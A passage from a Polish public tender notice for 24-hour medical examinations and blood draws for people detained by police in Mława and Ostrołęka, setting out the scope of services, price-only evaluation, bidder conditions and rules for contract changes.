się w KPP w Mławie<br/>Przedmiotem zamówienia są całodobowe, świadczone przez 7 dni w tygodniu usługi medyczne wobec osób zatrzymanych przez Policję garnizonu mazowieckiego w skład których wchodzić będzie:<br/>1.	Wykonanie badania lekarskiego osoby zatrzymanej, doprowadzonej przez Policję <br/>Po przeprowadzeniu badania lekarskiego lekarz stwierdza: <br/>a) brak przeciwwskazań medycznych do przebywania osoby w pomieszczeniu przeznaczonym <br/>dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pomieszczeniu przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich lub zakładzie poprawczym <br/>b) wystąpienie przeciwwskazań medycznych do przebywania tej osoby w policyjnym pomieszczeniu przeznaczonym dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pomieszczeniu przejściowych, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich lub zakładzie poprawczym oraz konieczności skierowania jej do podmiotu leczniczego.<br/><br/>Okoliczności, wskazane w podpunkcie a) i b) lekarz stwierdza w zaświadczeniu według wzoru stanowiącego załącznik do umowy (Nr 2 – właściwy dla osoby zatrzymanej lub Nr 3 właściwy dla osoby doprowadzonej w celu wytrzeźwienia) <br/><br/><br/>2.	Pobranie krwi od osoby doprowadzonej (bez badania analitycznego)<br/>Pakiet pobrania krwi wraz z drukiem protokołu pobrania krwi dostarcza <br/>każdorazowo policjant jednostki organizacyjnej Policji dokonującej zlecenia wykonania usługi. Policjant zabiera ze sobą pakiet z pobraną krwią celem dalszych badań laboratoryjnych. Pobranie krwi <br/>do badania odbywa się z zachowaniem warunków określonych w Rozporządzeniu Ministra Zdrowia <br/>z dnia 28 grudnia 2018 roku w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 2018 poz. 2472).<br/>Badanie lekarskie osoby zatrzymanej przeprowadza się niezwłocznie, w miarę możliwości przed innymi oczekującymi osobami zgodnie z § 4 ust.1 Rozporządzenia Ministra Spraw Wewnętrznych z dnia 13 września 2012 r. w sprawie badań lekarskich osób zatrzymanych przez Policję (Dz. U. z 2024 r. poz.516). <br/><br/>Przedmiot zamówienia należy wykonywać stosownie do postanowień zawartych w:<br/>	Rozporządzeniu Ministra Spraw Wewnętrznych z dnia 13 września 2012 r. w sprawie badań lekarskich osób zatrzymanych przez Policję (tj. Dz. U. z 2024 r., poz. 516), <br/>	Rozporządzeniu Ministra Spraw Wewnętrznych z dnia 4 czerwca 2012 r. w sprawie pomieszczeń przeznaczonych dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoi przejściowych, tymczasowych pomieszczeń i policyjnych izb dziecka, regulaminu pobytu w tych pomieszczeniach, pokojach i izbach oraz sposobu postępowania z zapisami obrazu z tych pomieszczeń pokoi i izba (tj. Dz. U. z 2023 r. poz. 2672 z póź. zm.), <br/>	Rozporządzeniu Ministra Zdrowia z dnia 28 grudnia 2018 roku w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 2018 poz. 2472).<br/>Badania lekarskie lub pobrania krwi będące przedmiotem zamówienia wykonawca wykonuje osobom doprowadzonym przez Policję w oparciu o pisemny wniosek dyżurnego jednostki Policji dokonującej zatrzymania, doprowadzenia, a w sytuacji widocznych obrażeń ciała lub utraty przytomności, także <br/>na ustny wniosek policjanta, a następnie potwierdzony pisemnym wnioskiem w ciągu 24 godzin. <br/>Wzór wniosku stanowi załącznik nr 1 do umowy. W ramach przedmiotu zamówienia wykonawca ma obowiązek w przypadkach koniecznych do opatrzenia ran u osoby badanej, a także wystawienia recepty na niezbędne leki.<br/>Wykonawca ponosi pełną odpowiedzialność za ewentualne błędy medyczne popełnione w trakcie realizacji usługi medycznej.<br/>Leczenie i udzielanie pomocy medycznej w nagłych przypadkach zagrożenia zdrowia lub życia osobom zatrzymanym przez Policję (w tym przebywającym w pomieszczeniach dla osób zatrzymanych) nie wchodzi w zakres przedmiotu zamówienia i odbywa się na zasadach powszechnego ubezpieczenia zdrowotnego.<br/>Transport osoby zatrzymanej w celu przeprowadzenia badania lekarskiego lub pobrania krwi <br/>zapewnia Policja, z zastrzeżeniem sytuacji, w której stan zdrowia osoby zatrzymanej <br/>wskazuje na potrzebę użycia do jej przewiezienia specjalnego środka transportu sanitarnego.<br/>Wykonawca zobowiązany będzie do wykonywania usług będących przedmiotem umowy całodobowo przez cały rok kalendarzowy, we wszystkie dni tygodnia, dni świąteczne i ustawowo wolne od pracy.<br/>Wykonawca zobowiązany jest świadczyć przedmiotowe usługi we wskazanej przez siebie placówce. Adres placówki w której świadczone będą usługi wykonawca poda w Formularzu ofertowym. <br/>Dla zadania nr 2 z uwagi na fakt, że pomieszczenia dla osób zatrzymanych przez policjantów z KPP w Mławie i z KPP w Żurominie znajdują się w KPP w Mławie placówka medyczna wskazana przez wykonawcę winna być usytuowana w granicach administracyjnych miasta powiatowego lub powiatu odpowiadającego KPP w Mławie.<br/>Ilość świadczonych usług przyjętych przez zamawiającego to ilość szacunkowa. Rzeczywista ilość badań lekarskich lub pobrań krwi będzie wynikała z faktycznych potrzeb zamawiającego <br/> w tym zakresie. Wykonawca nie będzie rościł żadnych praw w przypadku gdy zamawiający <br/>zamówi mniejszą ilość usług niż wskazana w tabeli. Minimalna wielkość usług wyniesie 60% wartości zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich znaczenie:<br/><br/>a.	cena - 100 % (100 pkt. maksymalna liczba punktów, która może być przyznana)<br/><br/>Przy dokonywaniu oceny komisja przetargowa posłuży się następującymi wzorami<br/>a) dla kryterium cena: <br/><br/> C N<br/>C = -------- x 100 pkt<br/> Co<br/> <br/>gdzie:<br/> C - przyznane punkty w kryterium cena, <br/>CN - najniższa cena ofertowa (brutto) spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/><br/>Ograniczenie w zakresie stosowania kryterium ceny nie będzie mieć zastosowania <br/>w sytuacji, gdy zamawiający określi w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. <br/>W niniejszym postępowaniu przedmiot zamówienia ma ustalone standardy jakościowe. Zamawiający na wystarczającym poziomie określił cechy jakościowe jakie ma spełniać usługa będąca przedmiotem zamówienia, ponieważ jej wymagania jakościowe szczegółowo określają przepisy prawa - przedmiotem zamówienia są usługi medyczne wynikające w całości z Rozporządzenia Ministra Spraw Wewnętrznych z dnia 13 września 2012 r. w sprawie badań lekarskich osób zatrzymanych przez Policję (tj. Dz. U. z 2024 r, poz. 516), Rozporządzenia Ministra Spraw Wewnętrznych z dnia 4 czerwca 2012 r. w sprawie pomieszczeń przeznaczonych dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoi przejściowych, tymczasowych pomieszczeń i policyjnych izb dziecka, regulaminu pobytu w tych pomieszczeniach, pokojach i izbach oraz sposobu postępowania z zapisami obrazu z tych pomieszczeń pokoi i izba (tj. Dz. U. z 2023 r. poz. 2672 z póź. zm.), Rozporządzenia Ministra Zdrowia z dnia 28 grudnia 2018 roku w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 2018 poz. 2472).<br/><br/><br/>Za najkorzystniejszą zostanie uznana oferta w ramach zadania nr 1-3 spośród złożonych, ważnych i niepodlegających odrzuceniu ofert, która uzyska najwyższą liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 3 - KMP Ostrołęka<br/>Przedmiotem zamówienia są całodobowe, świadczone przez 7 dni w tygodniu usługi medyczne wobec osób zatrzymanych przez Policję garnizonu mazowieckiego w skład których wchodzić będzie:<br/>1.	Wykonanie badania lekarskiego osoby zatrzymanej, doprowadzonej przez Policję Po przeprowadzeniu badania lekarskiego lekarz stwierdza: <br/>a) brak przeciwwskazań medycznych do przebywania osoby w pomieszczeniu przeznaczonym dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pomieszczeniu przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich lub zakładzie poprawczym <br/>b) wystąpienie przeciwwskazań medycznych do przebywania tej osoby w policyjnym pomieszczeniu przeznaczonym dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pomieszczeniu przejściowych, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich lub zakładzie poprawczym oraz konieczności skierowania jej do podmiotu leczniczego.<br/><br/>Okoliczności, wskazane w podpunkcie a) i b) lekarz stwierdza w zaświadczeniu według wzoru stanowiącego załącznik do umowy (Nr 2 – właściwy dla osoby zatrzymanej lub Nr 3 właściwy dla osoby doprowadzonej w celu wytrzeźwienia) <br/><br/>2.	Pobranie krwi od osoby doprowadzonej (bez badania analitycznego)<br/>Pakiet pobrania krwi wraz z drukiem protokołu pobrania krwi dostarcza <br/>każdorazowo policjant jednostki organizacyjnej Policji dokonującej zlecenia wykonania usługi. Policjant zabiera ze sobą pakiet z pobraną krwią celem dalszych badań laboratoryjnych. Pobranie krwi do badania odbywa się z zachowaniem warunków określonych w Rozporządzeniu Ministra Zdrowia <br/>z dnia 28 grudnia 2018 roku w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 2018 poz. 2472).<br/>Badanie lekarskie osoby zatrzymanej przeprowadza się niezwłocznie, w miarę możliwości przed innymi oczekującymi osobami zgodnie z § 4 ust.1 Rozporządzenia Ministra Spraw Wewnętrznych z dnia 13 września 2012 r. w sprawie badań lekarskich osób zatrzymanych przez Policję (Dz. U. z 2024 r. poz.516). <br/>Przedmiot zamówienia należy wykonywać stosownie do postanowień zawartych w:<br/>	Rozporządzeniu Ministra Spraw Wewnętrznych z dnia 13 września 2012 r. w sprawie badań lekarskich osób zatrzymanych przez Policję (tj. Dz. U. z 2024 r., poz. 516), <br/>	Rozporządzeniu Ministra Spraw Wewnętrznych z dnia 4 czerwca 2012 r. w sprawie pomieszczeń przeznaczonych dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoi przejściowych, tymczasowych pomieszczeń i policyjnych izb dziecka, regulaminu pobytu w tych pomieszczeniach, pokojach i izbach oraz sposobu postępowania z zapisami obrazu z tych pomieszczeń pokoi i izba (tj. Dz. U. z 2023 r. poz. 2672 z póź. zm.), <br/>	Rozporządzeniu Ministra Zdrowia z dnia 28 grudnia 2018 roku w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 2018 poz. 2472).<br/>Badania lekarskie lub pobrania krwi będące przedmiotem zamówienia wykonawca wykonuje osobom doprowadzonym przez Policję w oparciu o pisemny wniosek dyżurnego jednostki Policji dokonującej zatrzymania, doprowadzenia, a w sytuacji widocznych obrażeń ciała lub utraty przytomności, także <br/>na ustny wniosek policjanta, a następnie potwierdzony pisemnym wnioskiem w ciągu 24 godzin. <br/>Wzór wniosku stanowi załącznik nr 1 do umowy. W ramach przedmiotu zamówienia wykonawca ma obowiązek w przypadkach koniecznych do opatrzenia ran u osoby badanej, a także wystawienia recepty na niezbędne leki.<br/>Wykonawca ponosi pełną odpowiedzialność za ewentualne błędy medyczne popełnione w trakcie realizacji usługi medycznej.<br/>Leczenie i udzielanie pomocy medycznej w nagłych przypadkach zagrożenia zdrowia lub życia osobom zatrzymanym przez Policję (w tym przebywającym w pomieszczeniach dla osób zatrzymanych) nie wchodzi w zakres przedmiotu zamówienia i odbywa się na zasadach powszechnego ubezpieczenia zdrowotnego.<br/>Transport osoby zatrzymanej w celu przeprowadzenia badania lekarskiego lub pobrania krwi zapewnia Policja, z zastrzeżeniem sytuacji, w której stan zdrowia osoby zatrzymanej wskazuje na potrzebę użycia do jej przewiezienia specjalnego środka transportu sanitarnego.<br/>Wykonawca zobowiązany będzie do wykonywania usług będących przedmiotem umowy całodobowo przez cały rok kalendarzowy, we wszystkie dni tygodnia, dni świąteczne i ustawowo wolne od pracy.<br/>Wykonawca zobowiązany jest świadczyć przedmiotowe usługi we wskazanej przez siebie placówce. Adres placówki w której świadczone będą usługi wykonawca poda w Formularzu ofertowym. <br/>Dla zadania nr 3 placówka medyczna wskazana przez wykonawcę winna być usytuowana w granicach administracyjnych miasta powiatowego lub powiatu odpowiadającego jednostce Policji w ramach zadania. <br/>Ilość świadczonych usług przyjętych przez zamawiającego to ilość szacunkowa. Rzeczywista ilość badań lekarskich lub pobrań krwi będzie wynikała z faktycznych potrzeb zamawiającego w tym zakresie. Wykonawca nie będzie rościł żadnych praw w przypadku gdy zamawiający zamówi mniejszą ilość usług niż wskazana w tabeli. Minimalna wielkość usług wyniesie 60% wartości zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich znaczenie:<br/><br/>a.	cena - 100 % (100 pkt. maksymalna liczba punktów, która może być przyznana)<br/><br/>Przy dokonywaniu oceny komisja przetargowa posłuży się następującymi wzorami<br/>a) dla kryterium cena: <br/><br/><br/> C N<br/>C = -------- x 100 pkt<br/> Co<br/> gdzie:<br/>C - przyznane punkty w kryterium cena, <br/>CN - najniższa cena ofertowa (brutto) spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/><br/>Ograniczenie w zakresie stosowania kryterium ceny nie będzie mieć zastosowania <br/>w sytuacji, gdy zamawiający określi w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. <br/>W niniejszym postępowaniu przedmiot zamówienia ma ustalone standardy jakościowe. Zamawiający na wystarczającym poziomie określił cechy jakościowe jakie ma spełniać usługa będąca przedmiotem zamówienia, ponieważ jej wymagania jakościowe szczegółowo określają przepisy prawa - przedmiotem zamówienia są usługi medyczne wynikające w całości z Rozporządzenia Ministra Spraw Wewnętrznych z dnia 13 września 2012 r. w sprawie badań lekarskich osób zatrzymanych przez Policję (tj. Dz. U. z 2024 r, poz. 516), Rozporządzenia Ministra Spraw Wewnętrznych z dnia 4 czerwca 2012 r. w sprawie pomieszczeń przeznaczonych dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoi przejściowych, tymczasowych pomieszczeń i policyjnych izb dziecka, regulaminu pobytu w tych pomieszczeniach, pokojach i izbach oraz sposobu postępowania z zapisami obrazu z tych pomieszczeń pokoi i izba (tj. Dz. U. z 2023 r. poz. 2672 z póź. zm.), Rozporządzenia Ministra Zdrowia z dnia 28 grudnia 2018 roku w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 2018 poz. 2472).<br/><br/>Za najkorzystniejszą zostanie uznana oferta w ramach zadania nr 1-3 spośród złożonych, ważnych i niepodlegających odrzuceniu ofert, która uzyska najwyższą liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Wykonawca musi posiadać wpis do rejestru, o którym mowa w art. 100 ustawy z dnia 15 kwietnia 2011r. o działalności leczniczej (tj. Dz. U. z 2024 r. poz. 799) prowadzonego przez organ wskazany w art. 106 ust. 1.<br/>Zamawiający dokona oceny spełnienia tego warunku na podstawie załączonego do oferty Oświadczenia Wykonawcy, składanego na podstawie art. 125 ust. 1 ustawy Pzp <br/>– wzór oświadczenia stanowi załącznik nr 4 do SWZ.<br/><br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane, tj. posiada wpis do rejestru, o którym mowa w art. 100 ustawy z dnia 15 kwietnia 2011r. o działalności leczniczej (tj. Dz. U. z 2024 r. poz. 799) prowadzonego przez organ wskazany w art. 106 ust. 1.<br/> W takim przypadku wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą złożyć wraz z ofertą oświadczenie z którego wynika, które usługi wykonają poszczególni wykonawcy – wzór stanowi załącznik nr 5 do SWZ<br/>Oświadczenie o podziale zadań pomiędzy wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa w art. 117 ust. 4 ustawy Pzp, przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, elektronicznym podpisem zaufanym lub elektronicznym podpisem osobistym. W przypadku gdy oświadczenie zostało sporządzone jako dokument w formie papierowej i opatrzone podpisem własnoręcznym, przekazuje się elektroniczne odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, elektronicznym podpisem zaufanym lub elektronicznym podpisem osobistym.<br/>Poświadczenia cyfrowego odwzorowania z dokumentem w postaci papierowej dokonuje wykonawca wspólnie ubiegający się o udzielenie zamówienia (tj. mogą dokonać wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia ale także jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia, który umocowany został do prezentowania członków konsorcjum lub wspólników spółki cywilnej w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy dla zadania nr 1 - 3 wypełniony we wszystkich pozycjach zgodny ze składaną ofertą częściową<br/>(wzór stanowią załączniki 1.1 – 1.3 do SWZ)<br/>2) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik<br/>3) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych wspólnie przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4) Oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia o niepodleganiu wykluczeniu stanowi załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie o niepodleganiu wykluczeniu składa każdy z wykonawców.<br/>5) Oświadczenie wykonawcy o spełnianiu warunków udziału – wzór oświadczenia o spełnianiu warunków udziału w postępowaniu stanowi załącznik nr 4 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o spełnianiu warunków udziału w postępowaniu składa każdy z wykonawców.<br/>6) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) o którym mowa w art. 117 ust. 4 ustawy, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy, wniesione zgodnie z rozdz. XVII SWZ – wzór stanowi załącznik nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych wspólnie przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna)<br/>2) Oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia o niepodleganiu wykluczeniu stanowi załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z wykonawców.<br/>3) Oświadczenie wykonawcy o spełnianiu warunków udziału – wzór oświadczenia o spełnianiu warunków udziału w postępowaniu stanowi załącznik nr 4 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców( konsorcjum, spółka cywilna), oświadczenie o spełnianiu warunków udziału w postępowaniu składa każdy z wykonawców.<br/>4) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia(konsorcjum, spółka cywilna) o którym mowa w art. 117 ust. 4 ustawy, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy, wniesione zgodnie z rozdz. XVII SWZ – wzór stanowi załącznik nr 5 do SWZ.<br/>5) Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane, tj. posiada wpis do rejestru, o którym mowa w art. 100 ustawy z dnia 15 kwietnia 2011r. o działalności leczniczej (tj. Dz. U. z<br/>2023 r. poz. 991 z późn. zm.) prowadzonego przez organ wskazany w art. 106 ust. 1.<br/>W takim przypadku wykonawcy ubiegający się wspólnie o udzielenie zamówienia (konsorcjum, spółka cywilna) muszą złożyć wraz z ofertą oświadczenie z którego wynika, które usługi wykonają poszczególni wykonawcy – (wzór stanowi załącznik nr 5 do SWZ)<br/>Oświadczenie o podziale zadań pomiędzy wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa w art. 117 ust. 4 ustawy Pzp, przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, elektronicznym podpisem zaufanym lub elektronicznym podpisem osobistym. W przypadku gdy<br/>oświadczenie zostało sporządzone jako dokument w formie papierowej i opatrzone podpisem własnoręcznym, przekazuje się elektroniczne odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, elektronicznym podpisem zaufanym lub elektronicznym podpisem osobistym. Poświadczenia cyfrowego odwzorowania z dokumentem w postaci papierowej dokonuje wykonawca wspólnie ubiegający<br/>się o udzielenie zamówienia (tj. mogą dokonać wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia ale także jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia, który umocowany został do prezentowania członków konsorcjum lub wspólników spółki cywilnej w postepowaniu.<br/>6) Przed podpisaniem umowy wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum, spółka cywilna) przedstawią zamawiającemu kopię umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia, które zostaną wprowadzone do treści tej umowy, określone zostały w:<br/>1)	załączniku nr 2 do SWZ– projektowanych postanowieniach umowy <br/>Dopuszczalna jest zmiana wysokości wynagrodzenia należnego Wykonawcy, o którym mowa w § 2 ust. 1umowy oraz cen i wartości usług objętych umową w przypadku zmiany:<br/>1)	stawki podatku od towarów i usług oraz podatku akcyzowego;<br/>2)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz. U. z 2020 r. poz. 2207 z późn. zm. );<br/>3)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniom zdrowotnym lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne;<br/>4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (t.j. Dz. U. z 2024 r. poz. 427) - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>2. W przypadkach, o którym mowa w ust. 1 Wykonawca może zwrócić się do Zamawiającego z pisemnym wnioskiem o przeprowadzenie negocjacji dotyczących zmiany wysokości wynagrodzenia należnego Wykonawcy.<br/>3. Wykonawca może zwrócić się do Zamawiającego z wnioskiem, o którym mowa w ust. 2 po opublikowaniu zmian przepisów prawa, będących podstawą wnioskowania o zmianę wynagrodzenia. <br/>4. Wniosek, o którym mowa w ust. 2 musi zawierać:<br/>	1) wskazanie zmiany przepisów prawa, będącej przyczyną wystąpienia przez Wykonawcę z wnioskiem;<br/>	2) wskazanie wysokości proponowanej zmiany wynagrodzenia należnego Wykonawcy,<br/>	3) szczegółowe opisanie i przedstawienie wpływu zmian przepisów prawa na koszty wykonania zamówienia;<br/>	4) dokładne wyliczenie wysokości wzrostu kosztów wykonania Umowy w wyniku wprowadzenia zmian przepisów prawa, wraz z objaśnieniami do tych wyliczeń.<br/>5. Złożenie przez Wykonawcę wniosku, o którym mowa w ust. 2 niespełniającego wymagań, o których mowa w ust. 3, 4 nie będzie uznane za skuteczne, jeżeli Wykonawca nie uzupełni, na pisemne żądanie Zamawiającego, w terminie określonym przez Zamawiającego nie krótszym <br/>niż 5 dni, wniosku lub dokumentów uzasadniających wniosek.<br/>6. Wykonawca składając wniosek, o którym mowa w ust. 2 zobowiązany będzie udowodnić Zamawiającemu, że zmiany przepisów prawa rzeczywiście spowodują wzrost kosztów wykonania Umowy oraz udowodnić wysokość wzrostu kosztów wykonania Umowy.<br/>7. Zmiana wysokości wynagrodzenia należnego Wykonawcy, na skutek wniosku, o którym mowa w ust. 2 dotyczyć może wyłącznie wynagrodzenia należnego za niewykonaną, do dnia wejścia w życie zmian przepisów, o których mowa w ust. 1, części Umowy.<br/>8. Zmiana wysokości wynagrodzenia obowiązywać może nie wcześniej niż od dnia wejścia w życie zmian, o których mowa w ust. 1 pod warunkiem wypełnienia przez Wykonawcę powyższych obowiązków.<br/>9. Wynagrodzenie Wykonawcy nie może ulec zmianie wyższej, niż wzrost kosztów Wykonawcy wynikający z zaistnienia przynajmniej jednej z okoliczności, o których mowa w ust. 1 pkt 2, 3, 4.<br/>10. 